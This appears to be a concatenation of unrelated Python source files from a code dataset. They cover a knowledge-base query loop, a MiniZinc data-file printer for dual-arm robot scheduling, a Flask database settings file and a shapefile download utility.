ret = execute_kb_query_for_hops(spql_1_hop_literal, hop=1)
is_exception = ret[1]
if not is_exception:
all_subgraphs[empty_qid].append({'st': q_ent, 'en': ans_ent, 'chains': ret[0]})
all_len.append(len(ret[0]))
else:
print(spql_1_hop_literal)
print("Number of queries after executing query for literals: {}".format(len(all_subgraphs)))
out_file = os.path.join(args.output_dir, "{}_2_hop_train_chains.pkl".format(args.dataset_name.lower()))
with open(out_file, "wb") as fout:
pickle.dump(all_subgraphs, fout)
print("Min: {}, Mean: {}, Median: {}, Max:{}".format(np.min(all_len), np.mean(all_len), np.median(all_len),
np.max(all_len)))
| 2.21875 | 2 |
instance_data/problem_printer.py | LuddeWessen/assembly-robot-manager-minizinc | 3 | 12798048 | # MIT License
#
# Copyright (c) 2021 <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
from problem_instance import Problem
class ProblemPrinter:
def __init__(self, fixture_order_raw, duration_rnd_seed, **kwargs):
self.p = Problem(fixture_order_raw = fixture_order_raw, **kwargs)
self.fixture_order_raw = fixture_order_raw
self.no_grip = None
self.no_suction = None
self.duration_rnd_seed = duration_rnd_seed
    def GetFixtureOrderString(self):
        """Encode the raw fixture order as a string, e.g. [0, 1, -1] -> 'GS_'."""
        s = ""
current = ""
for i in range(len(self.fixture_order_raw)):
if self.fixture_order_raw[i] == 0:
current = "G"
elif self.fixture_order_raw[i] == 1:
current = "S"
elif self.fixture_order_raw[i] == -1:
current = "_"
else:
current = "ERROR"
s = s + current
return s
def GetNoComp(self):
return self.p.no_grip + self.p.no_suction
def FilePrint(self, file_name_prefix):
"""
Printing File Header
"""
setup_file_name = file_name_prefix + str(self.GetNoComp()) + "_" + self.GetFixtureOrderString() + ".dzn"
file1 = open(setup_file_name,"w")
file1.write("%-----------------------------------------------------------------------------%\n")
file1.write("% Dual Arm Multi Capacity Multi Tool Scheduling / Routing\n")
file1.write("% Assembly Configuration\n")
file1.write("% Auto Generated by python script, authored by <NAME> \n")
file1.write("%-----------------------------------------------------------------------------%\n\n\n")
"""
Printing durations
"""
self.p.RandomizeTaskDurations(self.duration_rnd_seed)
file1.write("task_durations = ")
file1.write(self.p.GetDurationsOfTasksString(str_offset=len("task_durations = ")+1))
file1.write('\n\n\n')
"""
Printing task sets
"""
file1.write("TRAY_TASKS = " + self.p.TrayTasksToString() + ";\n")
file1.write("CAMERA_TASKS = " + self.p.CameraTasksToString() + ";\n")
file1.write("OUTPUT_TASKS = " + self.p.OutputTasksToString() + ";\n")
file1.write('\n\n')
file1.write("empty_gripper_tasks = " + self.p.PressTasksToString() + ";\n")
file1.write('\n\n')
"""
Printing Tool Pick and Place- orders
"""
        # TODO: the last row does not seem to have a press - which it does not,
        # since it is output.
        # However, we assume it does! Fix!
file1.write("gripper_pick_tasks_orders = " + self.p.GetPickTaskOrderString(0) + ";\n\n")
file1.write("suction_pick_tasks_orders = " + self.p.GetPickTaskOrderString(1) + ";\n\n")
file1.write("fixture_task_orders = " + self.p.GetFixtureTaskOrderString() + ";\n\n")
file1.close()
return setup_file_name
| 2.296875 | 2 |
src/settings.py | weskleydamasceno/Sorveteria_backend | 0 | 12798049 | #
# Application settings
#
import os
from os.path import abspath
DEBUG = True
SECRET_KEY = 'a secret key'
# base directory
basedir = os.path.abspath(os.path.dirname(__name__))
# application base directory
BASE_DIR = basedir
# connection string: mysql://user:password@host/dbname
SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:root@localhost/dbdevweb'
# SQLAlchemy will track object modifications
SQLALCHEMY_TRACK_MODIFICATIONS = True | 2.03125 | 2 |
ds/beis_indicators/utils/geo_utils.py | nestauk/beis-indicators | 4 | 12798050 | <filename>ds/beis_indicators/utils/geo_utils.py
import geopandas as gpd
import os
import requests

from io import BytesIO
from urllib.request import urlretrieve
from zipfile import ZipFile

from beis_indicators.utils.nuts_utils import NUTS_INTRODUCED, NUTS_ENFORCED

# `project_dir` and `shape_lookup` are used below but were never defined in
# this module. The import and placeholder here are assumptions added to keep
# the snippet self-contained: `project_dir` normally comes from the package
# root, and `shape_lookup` should map shapefile names to download URLs.
from beis_indicators import project_dir  # assumed import
shape_lookup = {}  # hypothetical name -> URL mapping; populate before use
def get_shape(file_name, path):
    '''
    Utility function to download and extract a shapefile.

    Arguments:
        file_name: name of the shapefile entry to fetch (key into shape_lookup)
        path: directory prefix under which the archive is extracted
    '''
#Do we need to get the data or is it already there?
shape_names = os.listdir(f'{project_dir}/data/raw/shapefiles')
if file_name not in shape_names:
#Get the data
print(f'getting {file_name}...')
#Get url
url = shape_lookup[file_name]
#Request data
req = requests.get(url)
#Parse the content
z = ZipFile(BytesIO(req.content))
#Save
print(f'saving {file_name}...')
z.extractall(f'{path}{file_name}')
else:
print(f'{file_name} already collected')
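

# Hypothetical usage (assumes shape_lookup has been populated with a real URL
# and that the target directory exists):
#   shape_lookup['nuts2_2016'] = 'https://example.com/shapefiles/nuts2_2016.zip'
#   get_shape('nuts2_2016', f'{project_dir}/data/raw/shapefiles/')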
| 3.34375 | 3 |